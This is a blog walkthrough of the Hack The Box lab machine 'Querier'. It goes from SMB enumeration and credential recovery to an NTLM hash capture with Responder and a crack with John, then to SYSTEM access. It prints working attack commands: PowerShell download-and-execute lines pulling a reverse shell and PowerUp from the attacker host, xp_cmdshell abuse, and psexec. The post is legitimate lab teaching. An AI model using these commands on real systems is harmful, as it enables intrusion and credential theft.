18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Querier

Enummeration

Starting of with a portscan.

root@redteam:~/htb/querier# nmap -n -T4 -sV -sC -oN defaultscan 10.10.10.125
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 21:40 CEST
Host is up (0.022s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server  14.00.1000.00
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-06-17T04:16:07
| Not valid after:  2049-06-17T04:16:07
| MD5:   408c 1f69 ce32 03b4 6243 3836 e9b8 67ce
|_SHA-1: dff4 ce7d 4050 80b9 422b 66b4 ef66 1972 9a4b 2fe2
|_ssl-date: 2019-06-22T18:25:56+00:00; -1h14m27s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1h14m27s, deviation: 0s, median: -1h14m27s
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 
|_    TCP port: 1433
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-06-22 20:26:00
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 21:40
Completed NSE at 21:40, 0.00s elapsed
Initiating NSE at 21:40
Completed NSE at 21:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.62 seconds
           Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.056KB)

No webserver and some services which you need credentials for to make a connection.

SMB

root@redteam:~/htb/querier# smbmap -H 10.10.10.125 -u "guest"
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.125...
[+] IP: 10.10.10.125:445	Name: 10.10.10.125                                      
	Disk                                                  	Permissions
	----                                                  	-----------
	ADMIN$                                            	NO ACCESS
	C$                                                	NO ACCESS
	IPC$                                              	READ ONLY
	Reports                                           	READ ONLY

The share Reports is not default.

root@redteam:~/htb/querier# smbclient //10.10.10.125/Reports -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jan 29 00:23:48 2019
  ..                                  D        0  Tue Jan 29 00:23:48 2019
  Currency Volume Report.xlsm         A    12229  Sun Jan 27 23:21:34 2019

Looks like just one Excel file.

smb: \> get "Currency Volume Report.xlsm"
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (86.5 KiloBytes/sec) (average 86.5 KiloBytes/sec)

EXCEL

To check a OLE file on Kali there are several tools. This site has a nice overview.

root@redteam:~/htb/querier# olevba 'Currency Volume Report.xlsm' 
olevba 0.51 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OpX:M-S-H--- Currency Volume Report.xlsm
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

' macro to pull data for client volume reports
'
' further testing required

Private Sub Connect()

Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

If conn.State = adStateOpen Then

  ' MsgBox "connection successful"
 
  'Set rs = conn.Execute("SELECT * @@version;")
  Set rs = conn.Execute("SELECT * FROM volume;")
  Sheets(1).Range("A1").CopyFromRecordset rs
  rs.Close

End If

End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
+------------+-------------+-----------------------------------------+
| Type       | Keyword     | Description                             |
+------------+-------------+-----------------------------------------+
| Suspicious | Open        | May open a file                         |
| Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
|            |             | be used to obfuscate strings (option    |
|            |             | --decode to see all)                    |
+------------+-------------+-----------------------------------------+

It looks like the macro is recorded to make a connection with the SQL server, database Volume and there is also some credentials which it uses.

MSSQL

For a connection with the MSSQL server Impacket has a python script which can help.

root@redteam:~/htb/querier# mssqlclient.py reporting@10.10.10.125 -windows-auth
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL>
SQL> enable_xp_cmdshell
[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(QUERIER): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.

This user has no permission to perform this action. After browsing the internet I found a page with some nice information.

First starting up Responder.

root@redteam:~/htb/querier# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 2.3.3.9

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CRTL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.8]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']



[+] Listening for events...

Then use the command xp_deltree to connect to my IP.

SQL> xp_dirtree "\\10.10.14.8\test"
subdirectory                                                                                                                                                                                                                                                            depth   

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   -----------   

And capture the hash with Responder.

[SMBv2] NTLMv2-SSP Client   : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMBv2] NTLMv2-SSP Hash     : mssql-svc::QUERIER:adc9568c4b8fb9d4:D580EC639E550755311B0DA5528DA48D:0101000000000000C0653150DE09D201110D34E634CC0298000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000FEC94F05C7300E09E90D318168A2191C7763D53628DD63CA3EFA731E7AC45A780A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003800000000000000000000000000

CRACKING THE HASH

Because I run my Kali in a VM I use John instead of Hashcat.

root@redteam:~/htb/querier/hash# john --wordlist=/usr/share/wordlists/rockyou.txt --format=netntlmv2 hash 
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
corporate568     (mssql-svc)
1g 0:00:00:11 DONE (2019-06-22 22:46) 0.08960g/s 802775p/s 802775c/s 802775C/s correforenz..corococo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

There is the password.

root@redteam:~/htb/querier# mssqlclient.py mssql-svc@10.10.10.125 -windows-auth
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL>

Last user didn’t had permission. Let’s see if it different with this user.

SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL>

Looks like I can run commands with this user.

SQL> xp_cmdshell whoami
output                                                                             

--------------------------------------------------------------------------------   

querier\mssql-svc                                                                  

NULL

Getting some system information.

SQL> xp_cmdshell systeminfo
output                                                                             

--------------------------------------------------------------------------------   

NULL                                                                               

Host Name:                 QUERIER                                                 

OS Name:                   Microsoft Windows Server 2019 Standard                  

OS Version:                10.0.17763 N/A Build 17763                              

OS Manufacturer:           Microsoft Corporation                                   

OS Configuration:          Member Server                                           

OS Build Type:             Multiprocessor Free                                     

Registered Owner:          Windows User                                            

Registered Organization:                                                           

Product ID:                00429-00521-62775-AA073                                 

Original Install Date:     1/28/2019, 11:16:50 PM                                  

System Boot Time:          6/17/2019, 5:15:18 AM                                   

System Manufacturer:       VMware, Inc.                                            

System Model:              VMware7,1                                               

System Type:               x64-based PC                                            

Processor(s):              2 Processor(s) Installed.                               

                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz   

                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz   

BIOS Version:              VMware, Inc. VMW71.00V.7581552.B64.1801142334, 1/14/2018   

Windows Directory:         C:\Windows                                              

System Directory:          C:\Windows\system32                                     

Boot Device:               \Device\HarddiskVolume1                                 

System Locale:             en-us;English (United States)                           

Input Locale:              en-us;English (United States)                           

Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London           

Total Physical Memory:     2,047 MB                                                

Available Physical Memory: 812 MB                                                  

Virtual Memory: Max Size:  3,199 MB                                                

Virtual Memory: Available: 1,879 MB                                                

Virtual Memory: In Use:    1,320 MB                                                

Page File Location(s):     C:\pagefile.sys                                         

Domain:                    HTB.LOCAL                                               

Logon Server:              N/A                                                     

Hotfix(s):                 6 Hotfix(s) Installed.                                  

                           [01]: KB4481031                                         

                           [02]: KB4462930                                         

                           [03]: KB4470788                                         

                           [04]: KB4480056                                         

                           [05]: KB4480979                                         

                           [06]: KB4476976                                         

Network Card(s):           1 NIC(s) Installed.                                     

                           [01]: Intel(R) 82574L Gigabit Network Connection        

                                 Connection Name: Ethernet0                        

                                 DHCP Enabled:    No                               

                                 IP address(es)                                    

                                 [01]: 10.10.10.125                                

                                 [02]: fe80::ed0c:14f9:fdc3:63ca                   

                                 [03]: dead:beef::ed0c:14f9:fdc3:63ca              

Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.   

NULL

REVERSE SHELL

Time to get a reverse shell, which will give more freedom on this box. For this Kali has a folder with handy file called /usr/share/nishang. From this folder I copy a ps1 file to my working folder.

root@redteam:~/htb/querier/shell# cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1

Then add a line to the bottom of the file: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 9999

Now to get this file to the remote system. On my local machine I start a python server on port 80.

root@redteam:~/htb/querier/shell# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

On this site there is a command to download and execute the file.

SQL> xp_cmdshell powershell iex(New-Object System.Net.WebClient).DownloadString(\"http://10.10.14.8/shell.ps1\")
root@redteam:~/htb/querier/shell# nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.125] 49702
Windows PowerShell running as user mssql-svc on QUERIER
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>

PRIVILEGE ESCALATION

On the Desktop of this user is the first flag.

PS C:\users\mssql-svc\desktop> dir


    Directory: C:\users\mssql-svc\desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        1/28/2019  12:08 AM             33 user.txt

On this github page there are some excellent PowerShell scripts. One of them is PowerUp.ps1, which is like LinEnum.sh for Linux.

PS C:\users\mssql-svc\desktop> IEX(New-Object System.NEt.WebClient).DownloadString("http://10.10.14.8/PowerUp.ps1")
PS C:\users\mssql-svc\desktop> Invoke-AllChecks

The script finds several things and one of them is a password in plaintext.

[*] Checking for cached Group Policy Preferences .xml files....


Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {[SPOILER]}
File      : C:\ProgramData\Microsoft\Group 
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml

 

root@redteam:~/htb/querier/shell# smbmap -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!' -H 10.10.10.125 -d QUERIER
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.125...
[+] IP: 10.10.10.125:445	Name: 10.10.10.125                                      
	Disk                                                  	Permissions
	----                                                  	-----------
	ADMIN$                                            	READ, WRITE
	C$                                                	READ, WRITE
	IPC$                                              	READ ONLY
	Reports                                           	READ ONLY

With this account I have read and write permission.

root@redteam:~/htb/querier/shell# psexec.py administrator@10.10.10.125
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$
[*] Uploading file hrRThQSF.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service tszF on 10.10.10.125.....
[*] Starting service tszF.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Now for the final flag.

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is FE98-F373

 Directory of c:\Users\Administrator\Desktop

01/29/2019  01:04 AM    <DIR>          .
01/29/2019  01:04 AM    <DIR>          ..
01/28/2019  01:08 AM                33 root.txt
               1 File(s)             33 bytes
               2 Dir(s)   6,171,058,176 bytes free

And there we have it. A really nice box with some challenges. And finally a Windows machine for a change.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.